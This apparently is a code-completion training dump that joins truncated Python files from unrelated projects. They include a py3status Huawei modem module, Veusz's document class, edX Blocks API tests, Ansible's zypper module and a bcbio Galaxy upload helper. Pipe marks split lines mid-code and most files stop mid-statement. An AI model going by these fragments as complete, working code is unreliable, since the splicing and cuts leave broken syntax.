# if fake is not None then (mock) image LUs will be created
self._fake = False
if existing is None and fake is None:
raise ValueError("must specify existing or fake")
if existing is not None and fake is not None:
x = "must specify either existing or fake, but not both"
raise ValueError(x)
if fake is not None:
self._fake = True
prefix, num_images, image_size, thin, lut = fake
n = cs.sharedstoragepool.create_unique_name
images = [(n("%s%07d" % (prefix, i,)),
image_size, thin, lut) for i in range(num_images)]
(image_lu_pool, self._ssp) = self._ssp.update_append_lus(images)
# self._images = [lu.unique_device_id for |
hburg1234/py3status | py3status/modules/wwan_status.py | Python | bsd-3-clause | 7,301 | 0.000274 | # -*- coding: utf-8 -*-
"""
Display current network and ip address for newer Huwei modems.
It is tested for Huawei E3276 (usb-id 12d1:1506) aka Telekom Speed
Stick LTE III but may work on other devices, too.
DEPENDENCIES:
- netifaces
- pyserial
Configuration parameters:
- baudrate : There should be no need to configure this, but
feel free to experiment.
Default is 115200.
- cache_timeout : How often we refresh | this module in seconds.
Default is 5.
- consider_3G_degraded : If set to True, only 4G-networks will be
considered 'good'; 3G connections are shown
as 'degraded', which is yellow by default. Mostly
useful if you want to keep track of | where there
is a 4G connection.
Default is False.
- format_down : What to display when the modem is not plugged in
Default is: 'WWAN: down'
- format_error : What to display when modem can't be accessed.
Default is 'WWAN: {error}'
- format_no_service : What to display when the modem does not have a
network connection. This allows to omit the then
meaningless network generation. Therefore the
default is 'WWAN: ({status}) {ip}'
- format_up : What to display upon regular connection
Default is 'WWAN: ({status}/{netgen}) {ip}'
- interface : The default interface to obtain the IP address
from. For wvdial this is most likely ppp0.
For netctl it can be different.
Default is: ppp0
- modem : The device to send commands to. Default is
- modem_timeout : The timespan betwenn querying the modem and
collecting the response.
Default is 0.4 (which should be sufficient)
@author Timo Kohorst timo@kohorst-online.com
PGP: B383 6AE6 6B46 5C45 E594 96AB 89D2 209D DBF3 2BB5
"""
import subprocess
import netifaces as ni
import os
import stat
import serial
from time import time, sleep
class Py3status:
    """py3status module reporting WWAN status for Huawei USB modems."""
    # Configuration parameters (overridable from the i3status config);
    # see the module docstring for their meaning.
    baudrate = 115200
    cache_timeout = 5
    consider_3G_degraded = False
    format_down = 'WWAN: down'
    format_error = 'WWAN: {error}'
    format_no_service = 'WWAN: {status} {ip}'
    format_up = 'WWAN: {status} ({netgen}) {ip}'
    interface = "ppp0"
    modem = "/dev/ttyUSB1"
    modem_timeout = 0.4
    def wwan_status(self, i3s_output_list, i3s_config):
        """Query the modem over its serial port and build the i3bar dict.

        Returns a response dict with 'full_text', 'color' and
        'cached_until' keys, as expected by py3status.
        """
        # Huawei proprietary AT command reporting extended system info.
        query = "AT^SYSINFOEX"
        target_line = "^SYSINFOEX"
        # Set up the highest network generation to display as degraded
        if self.consider_3G_degraded:
            degraded_netgen = 3
        else:
            degraded_netgen = 2
        response = {}
        response['cached_until'] = time() + self.cache_timeout
        # Check if path exists and is a character device
        if os.path.exists(self.modem) and stat.S_ISCHR(os.stat(
                self.modem).st_mode):
            print("Found modem " + self.modem)
            try:
                ser = serial.Serial(
                    port=self.modem,
                    baudrate=self.baudrate,
                    # Values below work for my modem. Not sure if
                    # they neccessarily work for all modems
                    parity=serial.PARITY_ODD,
                    stopbits=serial.STOPBITS_ONE,
                    bytesize=serial.EIGHTBITS)
                if ser.isOpen():
                    ser.close()
                ser.open()
                ser.write((query + "\r").encode())
                print("Issued query to " + self.modem)
                # Give the modem time to answer before draining the buffer.
                sleep(self.modem_timeout)
                n = ser.inWaiting()
                modem_response = ser.read(n)
                ser.close()
            except:
                # NOTE(review): bare ``except:`` plus the no-op
                # ``PermissionError`` expression below look unintentional;
                # presumably this was meant to be
                # ``except (OSError, serial.SerialException):`` -- confirm.
                # This will happen...
                # 1) in the short timespan between the creation of the device node
                # and udev changing the permissions. If this message persists,
                # double check if you are using the proper device file
                # 2) if/when you unplug the device
                PermissionError
                print("Permission error")
                response['full_text'] = self.format_error.format(
                    error="no access to " + self.modem)
                response['color'] = i3s_config['color_bad']
                return response
            # Dissect response
            for line in modem_response.decode("utf-8").split('\n'):
                print(line)
                if line.startswith(target_line):
                    # Determine IP once the modem responds
                    ip = self._get_ip(self.interface)
                    if not ip:
                        ip = "no ip"
                    modem_answer = line.split(',')
                    # Length of the sub-mode field maps to 2G/3G/4G;
                    # assumes the ^SYSINFOEX reply layout -- TODO confirm.
                    netgen = len(modem_answer[-2]) + 1
                    netmode = modem_answer[-1].rstrip()[1:-1]
                    if netmode == "NO SERVICE":
                        response['full_text'] = self.format_no_service.format(
                            status=netmode,
                            ip=ip)
                        response['color'] = i3s_config['color_bad']
                    else:
                        response['full_text'] = self.format_up.format(
                            status=netmode,
                            netgen=str(netgen) + "G",
                            ip=ip)
                        if netgen <= degraded_netgen:
                            response['color'] = i3s_config['color_degraded']
                        else:
                            response['color'] = i3s_config['color_good']
                elif line.startswith("COMMAND NOT SUPPORT") or line.startswith(
                        "ERROR"):
                    response['color'] = i3s_config['color_bad']
                    response['full_text'] = self.format_error.format(
                        error="unsupported modem")
                else:
                    # Outputs can be multiline, so just try the next one
                    pass
        else:
            print(self.modem + " not found")
            response['color'] = i3s_config['color_bad']
            response['full_text'] = self.format_down
        return response
    def _get_ip(self, interface):
        """
        Returns the interface's IPv4 address if device exists and has a valid
        ip address. Otherwise, returns an empty string
        """
        if interface in ni.interfaces():
            addresses = ni.ifaddresses(interface)
            if ni.AF_INET in addresses:
                return addresses[ni.AF_INET][0]['addr']
        return ""
if __name__ == "__main__":
from time import sleep
x = Py3status()
config = {
'color_good': '#00FF00',
'color_bad': '#FF0000',
'color_degraded': '#FFFF00',
}
while True:
print(x.wwan_status([], config))
sleep(1)
|
arichar6/veusz | veusz/document/doc.py | Python | gpl-2.0 | 21,692 | 0.001337 | # document.py
# A module to handle documents
# Copyright (C) 2004 Jeremy S. Sanders
# Email: Jeremy Sanders <jeremy@jeremysanders.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##############################################################################
"""A class to represent Veusz documents, with dataset classes."""
from __future__ import division, print_function, absolute_import
import codecs
import os.path
import traceback
import datetime
from collections import defaultdict
try:
import h5py
except ImportError:
h5py = None
from ..compat import citems, cvalues, cstr, CStringIO, cexecfile
from .. import qtall as qt4
from . import widgetfactory
from . import painthelper
from . import evaluate
from .. import datasets
from .. import utils
from .. import setting
def _(text, disambiguation=None, context="Document"):
    """Translate ``text`` via Qt's translation system.

    ``context`` groups related strings; ``disambiguation`` separates
    identical source strings that carry different meanings.
    """
    return qt4.QCoreApplication.translate(context, text, disambiguation)
def getSuitableParent(widgettype, initialwidget):
    """Return the nearest ancestor (starting at ``initialwidget``) that can
    parent a widget of type ``widgettype``, or None if there is none."""
    # ask the factory which widget class we are trying to place
    wc = widgetfactory.thefactory.getWidgetClass(widgettype)
    # walk up the tree until a widget accepts this child type
    candidate = initialwidget
    while candidate is not None and not wc.willAllowParent(candidate):
        candidate = candidate.parent
    return candidate
class DocSuspend(object):
    """Context manager suspending a document's update notifications.

    On entry the document's updates are suspended; on exit (normal or
    exceptional) they are re-enabled.
    """
    def __init__(self, doc):
        self.doc = doc
    def __enter__(self):
        self.doc.suspendUpdates()
        return self
    def __exit__(self, exc_type, exc_value, exc_tb):
        self.doc.enableUpdates()
class Document(qt4.QObject):
"""Document class for holding the graph data.
"""
pluginsloaded = False
# this is emitted when the document is modified
signalModified = qt4.pyqtSignal(int)
# emited to log a message
sigLog = qt4.pyqtSignal(cstr)
# emitted when document wiped
sigWiped = qt4.pyqtSignal()
# to ask whether the import is allowed (module name and symbol list)
sigAllowedImports = qt4.pyqtSignal(cstr, list)
    def __init__(self):
        """Initialise the document."""
        qt4.QObject.__init__( self )
        # plugins are loaded once per process, on first Document creation
        if not Document.pluginsloaded:
            Document.loadPlugins()
            Document.pluginsloaded = True
        # change tracking of document as a whole
        self.changeset = 0 # increased when the document changes
        # map tags to dataset names
        self.datasettags = defaultdict(list)
        # if set, do not notify listeners of updates
        # wait under enableUpdates
        self.suspendupdates = []
        # default document locale
        self.locale = qt4.QLocale()
        # evaluation context
        self.evaluate = evaluate.Evaluate(self)
        self.clearHistory()
        self.wipe()
    def wipe(self):
        """Wipe out any stored data."""
        # datasets by name
        self.data = {}
        # fresh root widget for the (now empty) document
        self.basewidget = widgetfactory.thefactory.makeWidget(
            'document', None, self)
        self.setModified(False)
        self.filename = ""
        self.evaluate.wipe()
        self.sigWiped.emit()
    def clearHistory(self):
        """Clear any history."""
        self.historybatch = []
        self.historyundo = []
        self.historyredo = []
    def suspendUpdates(self):
        """Holds sending update messages.
        This speeds up modification of the document and prevents the document
        from being updated on the screen."""
        # remember the changeset at suspension time so enableUpdates can
        # tell whether anything changed while suspended
        self.suspendupdates.append(self.changeset)
    def enableUpdates(self):
        """Reenables document updates."""
        changeset = self.suspendupdates.pop()
        if not self.suspendupdates and changeset != self.changeset:
            # bump this up as some watchers might ignore this otherwise
            self.changeset += 1
            self.setModified()
    def suspend(self):
        """Return context manager for suspending updates."""
        return DocSuspend(self)
    def makeDefaultDoc(self):
        """Add default widgets to create document."""
        page = widgetfactory.thefactory.makeWidget('page', self.basewidget, self)
        widgetfactory.thefactory.makeWidget('graph', page, self)
        # mark modified then immediately reset, so a fresh default
        # document reads as unchanged
        self.setModified()
        self.setModified(False)
        self.changeset = 0
    def log(self, message):
        """Log a message - this is emitted as a signal."""
        self.sigLog.emit(message)
    def applyOperation(self, operation, redoing=False):
        """Apply operation to the document.
        Operations represent atomic actions which can be done to the document
        and undone.
        Updates are suspended during the operation.
        If redoing is not True, the redo stack is cleared
        """
        with DocSuspend(self):
            retn = operation.do(self)
            self.changeset += 1
        if self.historybatch:
            # in batch mode, create an OperationMultiple for all changes
            self.historybatch[-1].addOperation(operation)
        else:
            # standard mode
            # only the last 10 operations are kept for undo
            self.historyundo = self.historyundo[-9:] + [operation]
        if not redoing:
            self.historyredo = []
        return retn
    def batchHistory(self, batch):
        """Enable/disable batch history mode.
        In this mode further operations are added to the OperationMultiple specified,
        until batchHistory is called with None.
        The objects are pushed into a list and popped off
        This allows multiple operations to be batched up for simple undo.
        """
        if batch:
            self.historybatch.append(batch)
        else:
            self.historybatch.pop()
    def undoOperation(self):
        """Undo the previous operation."""
        operation = self.historyundo.pop()
        with DocSuspend(self):
            operation.undo(self)
            self.changeset += 1
        # undone operations become redoable
        self.historyredo.append(operation)
    def canUndo(self):
        """Returns True if previous operation can be removed."""
        return len(self.historyundo) != 0
    def redoOperation(self):
        """Redo undone operations."""
        operation = self.historyredo.pop()
        # re-applying pushes the operation back onto the undo stack
        return self.applyOperation(operation, redoing=True)
    def canRedo(self):
        """Returns True if previous operation can be redone."""
        return len(self.historyredo) != 0
    def isBlank(self):
        """Is the document unchanged?"""
        return self.changeset == 0
    def setData(self, name, dataset):
        """Set dataset in document."""
        self.data[name] = dataset
        dataset.document = self
        # update the change tracking
        self.setModified()
    def deleteData(self, name):
        """Remove a dataset"""
        del self.data[name]
        self.setModified()
    def modifiedData(self, dataset):
        """Notify dataset was modified"""
        # dataset must already belong to this document
        assert dataset in self.data.values()
        self.setModified()
    def getLinkedFiles(self, filenames=None):
        """Get a list of LinkedFile objects used by the document.
        if filenames is a set, only get the objects with filenames given
        """
        # use a set to deduplicate files shared by several datasets
        links = set()
        for ds in cvalues(self.data):
            if ds.linked and (filenames is None or
                              ds.linked.filename in filenames):
                links.add(ds.linked)
        return list(links)
def reloadLinkedDatasets(self, filenames=None):
"""Reload linked datasets |
jolyonb/edx-platform | lms/djangoapps/course_api/blocks/tests/test_api.py | Python | agpl-3.0 | 9,363 | 0.002563 | """
Tests for Blocks api.py
"""
from itertools import product
from mock import patch
import ddt
from django.test.client import RequestFactory
from openedx.core.djangoapps.content.block_structure.api import clear_course_from_cache
from openedx.core.djangoapps.content.block_structure.config import STORAGE_BACKING_FOR_CACHE, waffle
from student.tests.factories import UserFactory
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import SampleCourseFactory, check_mongo_calls
from xmodule.modulestore.tests.sample_courses import BlockInfo
from ..api import get_blocks
class TestGetBlocks(SharedModuleStoreTestCase):
    """
    Tests for the get_blocks function
    """
    @classmethod
    def setUpClass(cls):
        super(TestGetBlocks, cls).setUpClass()
        with cls.store.default_store(ModuleStoreEnum.Type.split):
            cls.course = SampleCourseFactory.create()
        # hide the html block
        cls.html_block = cls.store.get_item(cls.course.id.make_usage_key('html', 'html_x1a_1'))
        cls.html_block.visible_to_staff_only = True
        cls.store.update_item(cls.html_block, ModuleStoreEnum.UserID.test)
    def setUp(self):
        super(TestGetBlocks, self).setUp()
        # a regular (non-staff) user issuing the request
        self.user = UserFactory.create()
        self.request = RequestFactory().get("/dummy")
        self.request.user = self.user
    def test_basic(self):
        # the staff-only html block must be filtered out for a regular user
        blocks = get_blocks(self.request, self.course.location, self.user)
        self.assertEquals(blocks['root'], unicode(self.course.location))
        # subtract for (1) the orphaned course About block and (2) the hidden Html block
        self.assertEquals(len(blocks['blocks']), len(self.store.get_items(self.course.id)) - 2)
        self.assertNotIn(unicode(self.html_block.location), blocks['blocks'])
    def test_no_user(self):
        # with no user, access checks are skipped and the hidden block appears
        blocks = get_blocks(self.request, self.course.location)
        self.assertIn(unicode(self.html_block.location), blocks['blocks'])
    def test_access_before_api_transformer_order(self):
        """
        Tests the order of transformers: access checks are made before the api
        transformer is applied.
        """
        blocks = get_blocks(self.request, self.course.location, self.user, nav_depth=5, requested_fields=['nav_depth'])
        vertical_block = self.store.get_item(self.course.id.make_usage_key('vertical', 'vertical_x1a'))
        problem_block = self.store.get_item(self.course.id.make_usage_key('problem', 'problem_x1a_1'))
        vertical_descendants = blocks['blocks'][unicode(vertical_block.location)]['descendants']
        self.assertIn(unicode(problem_block.location), vertical_descendants)
        self.assertNotIn(unicode(self.html_block.location), vertical_descendants)
    def test_sub_structure(self):
        # requesting a subtree root returns only blocks inside that subtree
        sequential_block = self.store.get_item(self.course.id.make_usage_key('sequential', 'sequential_y1'))
        blocks = get_blocks(self.request, sequential_block.location, self.user)
        self.assertEquals(blocks['root'], unicode(sequential_block.location))
        self.assertEquals(len(blocks['blocks']), 5)
        for block_type, block_name, is_inside_of_structure in (
                ('vertical', 'vertical_y1a', True),
                ('problem', 'problem_y1a_1', True),
                ('chapter', 'chapter_y', False),
                ('sequential', 'sequential_x1', False),
        ):
            block = self.store.get_item(self.course.id.make_usage_key(block_type, block_name))
            if is_inside_of_structure:
                self.assertIn(unicode(block.location), blocks['blocks'])
            else:
                self.assertNotIn(unicode(block.location), blocks['blocks'])
    def test_filtering_by_block_types(self):
        sequential_block = self.store.get_item(self.course.id.make_usage_key('sequential', 'sequential_y1'))
        # not filtered blocks
        blocks = get_blocks(self.request, sequential_block.location, self.user, requested_fields=['type'])
        self.assertEquals(len(blocks['blocks']), 5)
        found_not_problem = False
        for block in blocks['blocks'].itervalues():
            if block['type'] != 'problem':
                found_not_problem = True
        self.assertTrue(found_not_problem)
        # filtered blocks
        blocks = get_blocks(self.request, sequential_block.location, self.user,
                            block_types_filter=['problem'], requested_fields=['type'])
        self.assertEquals(len(blocks['blocks']), 3)
        for block in blocks['blocks'].itervalues():
            self.assertEqual(block['type'], 'problem')
# TODO: Remove this class after REVE-52 lands and old-mobile-app traffic falls to < 5% of mobile traffic
@ddt.ddt
class TestGetBlocksMobileHack(SharedModuleStoreTestCase):
    """
    Tests that requests from the mobile app don't receive empty containers.
    """
    @classmethod
    def setUpClass(cls):
        super(TestGetBlocksMobileHack, cls).setUpClass()
        # one entirely-empty container chain and one fully-populated one
        with cls.store.default_store(ModuleStoreEnum.Type.split):
            cls.course = SampleCourseFactory.create(
                block_info_tree=[
                    BlockInfo('empty_chapter', 'chapter', {}, [
                        BlockInfo('empty_sequential', 'sequential', {}, [
                            BlockInfo('empty_vertical', 'vertical', {}, []),
                        ]),
                    ]),
                    BlockInfo('full_chapter', 'chapter', {}, [
                        BlockInfo('full_sequential', 'sequential', {}, [
                            BlockInfo('full_vertical', 'vertical', {}, [
                                BlockInfo('html', 'html', {}, []),
                            ]),
                        ]),
                    ])
                ]
            )
    def setUp(self):
        super(TestGetBlocksMobileHack, self).setUp()
        self.user = UserFactory.create()
        self.request = RequestFactory().get("/dummy")
        self.request.user = self.user
    @ddt.data(
        *product([True, False], ['chapter', 'sequential', 'vertical'])
    )
    @ddt.unpack
    def test_empty_containers(self, is_mobile, container_type):
        # empty containers are stripped only for mobile-app requests
        with patch('lms.djangoapps.course_api.blocks.api.is_request_from_mobile_app', return_value=is_mobile):
            blocks = get_blocks(self.request, self.course.location)
        full_container_key = self.course.id.make_usage_key(container_type, 'full_{}'.format(container_type))
        self.assertIn(str(full_container_key), blocks['blocks'])
        empty_container_key = self.course.id.make_usage_key(container_type, 'empty_{}'.format(container_type))
        assert_containment = self.assertNotIn if is_mobile else self.assertIn
        assert_containment(str(empty_container_key), blocks['blocks'])
@ddt.ddt
class TestGetBlocksQueryCountsBase(SharedModuleStoreTestCase):
    """
    Base for the get_blocks tests.
    """
    # signals that must fire so block structures get (re)built on publish
    ENABLED_SIGNALS = ['course_published']
    def setUp(self):
        super(TestGetBlocksQueryCountsBase, self).setUp()
        self.user = UserFactory.create()
        self.request = RequestFactory().get("/dummy")
        self.request.user = self.user
    def _create_course(self, store_type):
        """
        Creates the sample course in the given store type.
        """
        with self.store.default_store(store_type):
            return SampleCourseFactory.create()
    def _get_blocks(self, course, expected_mongo_queries, expected_sql_queries):
        """
        Verifies the number of expected queries when calling
        get_blocks on the given course.
        """
        with check_mongo_calls(expected_mongo_queries):
            with self.assertNumQueries(expected_sql_queries):
                get_blocks(self.request, course.location, self.user)
@ddt.ddt
class TestGetBlocksQueryCounts(TestGetBlocksQueryCountsBase):
"""
Tests query counts for the get_blocks function.
"""
@ddt.data(
*product(
(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split),
(True, False),
)
)
@ddt.unpack
def test_ |
kbrebanov/ansible | lib/ansible/modules/packaging/os/zypper.py | Python | gpl-3.0 | 17,518 | 0.003768 | #!/usr/bin/python -tt
# -*- coding: utf-8 -*-
# (c) 2013, Patrick Callahan <pmc@patrickcallahan.com>
# based on
# openbsd_pkg
# (c) 2013
# Patrik Lundin <patrik.lundin.swe@gmail.com>
#
# yum
# (c) 2012, Red Hat, Inc
# Written by Seth Vidal <skvidal at fedoraproject.org>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: zypper
author:
- "Patrick Callahan (@dirtyharrycallahan)"
- "Alexander Gubin (@alxgu)"
- "Thomas O'Donnell (@andytom)"
- "Robin Roth (@robinro)"
- "Andrii Radyk (@AnderEnder)"
version_added: "1.2"
short_description: Manage packages on SUSE and openSUSE
description:
- Manage packages on SUSE and openSUSE using the zypper and rpm tools.
options:
name:
description:
- Package name C(name) or package specifier or a list of either.
- Can include a version like C(name=1.0), C(name>3.4) or C(name<=2.7). If a version is given, C(oldpackage) is implied and zypper is allowed to
update the package within the version range given.
- You can also pass a url or a local path to a rpm file.
- When using state=latest, this can be '*', which updates all installed packages.
required: true
aliases: [ 'pkg' ]
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
C(dist-upgrade) will make sure the latest version of all installed packages from all enabled repositories is installed.
- When using C(dist-upgrade), I(name) should be C('*').
required: false
choices: [ present, latest, absent, dist-upgrade ]
default: "present"
type:
description:
- The type of package to be operated on.
required: false
choices: [ package, patch, pattern, product, srcpackage, application ]
default: "package"
version_added: "2.0"
disable_gpg_check:
description:
- Whether to disable to GPG signature checking of the package
signature being installed. Has an effect only if state is
I(present) or I(latest).
required: false
default: "no"
choices: [ "yes", "no" ]
disable_recommends:
version_added: "1.8"
description:
- Corresponds to the C(--no-recommends) option for I(zypper). Default behavior (C(yes)) modifies zypper's default behavior; C(no) does
install recommended packages.
required: false
default: "yes"
choices: [ "yes", "no" ]
force:
version_added: "2.2"
description:
- Adds C(--force) option to I(zypper). Allows to downgrade packages and change vendor or architecture.
required: false
default: "no"
choices: [ "yes", "no" ]
update_cache:
version_added: "2.2"
description:
- Run the equivalent of C(zypper refresh) before the operation. Disabled in check mode.
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: [ "refresh" ]
oldpackage:
version_added: "2.2"
description:
- Adds C(--oldpackage) option to I(zypper). Allows to downgrade packages with less side-effects than force. This is implied as soon as a
version is specified as part of the package name.
required: false
default: "no"
choices: [ "yes", "no" ]
extra_args:
version_added: "2.4"
required: false
description:
- Add additional options to C(zypper) command.
- Options should be supplied in a single line as if given in the command line.
notes:
- When used with a `loop:` each package will be processed individually,
it is much more efficient to pass the list directly to the `name` option.
# informational: requirements for nodes
requirements:
- "zypper >= 1.0 # included in openSuSE >= 11.1 or SuSE Linux Enterprise Server/Desktop >= 11.0"
- python-xml
- rpm
'''
EXAMPLES = '''
# Install "nmap"
- zypper:
name: nmap
state: present
# Install apache2 with recommended packages
- zypper:
name: apache2
state: present
disable_recommends: no
# Apply a given patch
- zypper:
name: openSUSE-2016-128
state: present
type: patch
# Remove the "nmap" package
- zypper:
name: nmap
state: absent
# Install the nginx rpm from a remote repo
- zypper:
name: 'http://nginx.org/packages/sles/12/x86_64/RPMS/nginx-1.8.0-1.sles12.ngx.x86_64.rpm'
state: present
# Install local rpm file
- zypper:
name: /tmp/fancy-software.rpm
state: present
# Update all packages
- zypper:
name: '*'
state: latest
# Apply all available patches
- zypper:
name: '*'
state: latest
type: patch
# Perform a dist-upgrade with additional arguments
- zypper:
name: '*'
state: dist-upgrade
extra_args: '--no-allow-vendor-change --allow-arch-change'
# Refresh repositories and update package "openssl"
- zypper:
name: openssl
state: present
update_cache: yes
# Install specific version (possible comparisons: <, >, <=, >=, =)
- zypper:
name: 'docker>=1.10'
state: present
# Wait 20 seconds to acquire the lock before failing
- zypper:
name: mosh
state: present
environment:
ZYPP_LOCK_TIMEOUT: 20
'''
import xml
import re
from xml.dom.minidom import parseString as parseXML
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
class Package:
    """A single package request parsed from the module's ``name`` argument.

    Stores the bare package name, the action prefix ('+' install, '-' remove)
    and any version restriction (e.g. '>=1.10').
    """

    def __init__(self, name, prefix, version):
        self.name = name
        self.prefix = prefix
        self.version = version
        # '+' requests installation; anything else means removal.
        self.shouldinstall = prefix == '+'

    def __str__(self):
        # Round-trip back to the zypper argument form, e.g. '+docker>=1.10'.
        return '{0}{1}{2}'.format(self.prefix, self.name, self.version)
def split_name_version(name):
    """Split a zypper package specifier into (prefix, name, version).

    Example formats:
        - docker>=1.10
        - apache=2.4

    Allowed version specifiers: <, >, <=, >=, =
    Allowed version format: [0-9.-]*
    Also allows a prefix indicating remove "-", "~" or install "+"

    :param name: package specifier, possibly with prefix and version
    :return: tuple (prefix, name, version) where prefix is '', '+' or '-'
    """
    prefix = ''
    # Guard against empty input (previously raised IndexError on name[0]).
    if name and name[0] in ('-', '~', '+'):
        prefix = name[0]
        name = name[1:]
    if prefix == '~':
        # '~' is an alternate spelling for removal.
        prefix = '-'
    version_check = re.compile('^(.*?)((?:<|>|<=|>=|=)[0-9.-]*)?$')
    match = version_check.match(name)
    if match is None:
        # The pattern can match any string, so this is only a defensive
        # fallback; the previous bare `except:` is gone.
        return prefix, name, ''
    pkg_name, version = match.groups()
    return prefix, pkg_name, version if version is not None else ''
def get_want_state(names, remove=False):
    """Split the requested names into Package objects and raw URLs/rpm paths.

    :param names: list of package specifiers, URLs or local .rpm paths
    :param remove: when True, unprefixed names default to removal
    :return: tuple (list of Package, list of url/rpm strings)
    """
    packages = []
    urls = []
    default_prefix = '-' if remove else '+'
    for name in names:
        # URLs and rpm files are passed through to zypper untouched.
        if '://' in name or name.endswith('.rpm'):
            urls.append(name)
            continue
        prefix, pname, version = split_name_version(name)
        if prefix not in ('-', '+'):
            prefix = default_prefix
        packages.append(Package(pname, prefix, version))
    return packages, urls
def get_installed_state(m, packages):
    """Query zypper for the installed state of the given packages.

    :param m: AnsibleModule instance used to run the command
    :param packages: iterable of Package objects to look up
    :return: parsed package-state dict from `zypper search`
    """
    cmd = get_cmd(m, 'search')
    cmd += ['--match-exact', '--details', '--installed-only']
    cmd += [p.name for p in packages]
    # Missing packages are expected here, so do not treat them as failures.
    return parse_zypper_xml(m, cmd, fail_not_found=False)[0]
def parse_zypper_xml(m, cmd, fail_not_found=True, packages=None):
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
try:
dom = parseXML(stdout)
except xml.parsers.expat.ExpatError as exc:
m.fail_json(msg="Failed to parse zypper xml output: %s" % to_native(exc),
rc=rc, stdout=stdout, stderr=stderr, cmd=cmd)
if rc == 104:
# exit code 1 |
Cyberbio-Lab/bcbio-nextgen | bcbio/upload/galaxy.py | Python | mit | 8,109 | 0.004316 | """Move files to local Galaxy upload directory and add to Galaxy Data Libraries.
Required configurable variables in upload:
dir
"""
import collections
import os
import shutil
import time
from bcbio import utils
from bcbio.log import logger
from bcbio.upload import filesystem
from bcbio.pipeline import qcsummary
# Avoid bioblend import errors, raising at time of use
try:
import bioblend
from bioblend.galaxy import GalaxyInstance
import simplejson
except ImportError:
GalaxyInstance, bioblend, simplejson = None, None, None
def update_file(finfo, sample_info, config):
    """Update file in Galaxy data libraries.

    Dispatches either to a direct tool-output copy or to a data library
    upload, depending on whether pre-declared outputs are configured.
    """
    if GalaxyInstance is None:
        raise ImportError("Could not import bioblend.galaxy")
    if "dir" not in config:
        raise ValueError("Galaxy upload requires `dir` parameter in config specifying the "
                         "shared filesystem path to move files to.")
    if "outputs" in config:
        # Tool-style upload: copy straight to the pre-declared output paths.
        _galaxy_tool_copy(finfo, config["outputs"])
        return
    # Library-style upload: stage on shared storage, then register in Galaxy.
    _galaxy_library_upload(finfo, sample_info, config)
def _galaxy_tool_copy(finfo, outputs):
"""Copy information directly to pre-defined outputs from a Galaxy tool.
XXX Needs generalization
"""
tool_map = {"align": "bam", "variants": "vcf.gz"}
for galaxy_key, finfo_type in tool_map.items():
if galaxy_key in outputs and finfo.get("type") == finfo_type:
shutil.copy(finfo["path"], outputs[galaxy_key])
def _galaxy_library_upload(finfo, sample_info, config):
    """Upload results to galaxy library.

    Stages the file into a flowcell-specific folder on shared storage, then
    registers it in a Galaxy data library via the bioblend API.

    :param finfo: output file description (uses ``path``, ``type``, ``ext``
                  and the optional ``index``/``plus`` flags)
    :param sample_info: per-sample metadata; required for library selection
    :param config: must provide ``dir``, ``fc_date``, ``fc_name``,
                   ``galaxy_url`` and ``galaxy_api_key``
    :raises ValueError: when Galaxy connection details are missing
    """
    folder_name = "%s_%s" % (config["fc_date"], config["fc_name"])
    storage_dir = utils.safe_makedir(os.path.join(config["dir"], folder_name))
    if finfo.get("type") == "directory":
        storage_file = None
        if finfo.get("ext") == "qc":
            # QC directories are collapsed into a single summary PDF when possible.
            pdf_file = qcsummary.prep_pdf(finfo["path"], config)
            if pdf_file:
                finfo["path"] = pdf_file
                finfo["type"] = "pdf"
                # NOTE(review): non-QC (or PDF-less) directories leave
                # storage_file as None and are skipped below -- confirm intended.
                storage_file = filesystem.copy_finfo(finfo, storage_dir, pass_uptodate=True)
    else:
        storage_file = filesystem.copy_finfo(finfo, storage_dir, pass_uptodate=True)
    if "galaxy_url" in config and "galaxy_api_key" in config:
        galaxy_url = config["galaxy_url"]
        if not galaxy_url.endswith("/"):
            galaxy_url += "/"
        gi = GalaxyInstance(galaxy_url, config["galaxy_api_key"])
    else:
        raise ValueError("Galaxy upload requires `galaxy_url` and `galaxy_api_key` in config")
    # Only primary outputs are registered: index and secondary ("plus")
    # files stay on shared storage without a library record.
    if storage_file and sample_info and not finfo.get("index", False) and not finfo.get("plus", False):
        _to_datalibrary_safe(storage_file, gi, folder_name, sample_info, config)
def _to_datalibrary_safe(fname, gi, folder_name, sample_info, config):
    """Upload with retries for intermittent JSON failures.

    Galaxy API calls occasionally fail with transient JSON decode or
    connection errors; retry up to ``max_tries`` additional times, pausing
    between attempts, before letting the exception propagate.
    """
    num_tries = 0
    max_tries = 5
    while 1:
        try:
            _to_datalibrary(fname, gi, folder_name, sample_info, config)
            break
        except (simplejson.scanner.JSONDecodeError, bioblend.galaxy.client.ConnectionError) as e:
            num_tries += 1
            if num_tries > max_tries:
                raise
            # NOTE: Python 2 print statement -- this module predates py3 support.
            print "Retrying upload, failed with:", str(e)
            time.sleep(5)
def _to_datalibrary(fname, gi, folder_name, sample_info, config):
    """Upload a file to a Galaxy data library in a project specific folder.

    Resolves the target library, lists its contents once, then reuses that
    listing for both folder lookup and duplicate-file detection.
    """
    library = _get_library(gi, sample_info, config)
    contents = gi.libraries.show_library(library.id, contents=True)
    target_folder = _get_folder(gi, folder_name, library, contents)
    _file_to_folder(gi, fname, sample_info, contents, library, target_folder)
def _file_to_folder(gi, fname, sample_info, libitems, library, folder):
"""Check if file exists on Galaxy, if not upload to specified folder.
"""
full_name = os.path.join(folder["name"], os.path.basename(fname))
# Handle VCF: Galaxy reports VCF files without the gzip extension
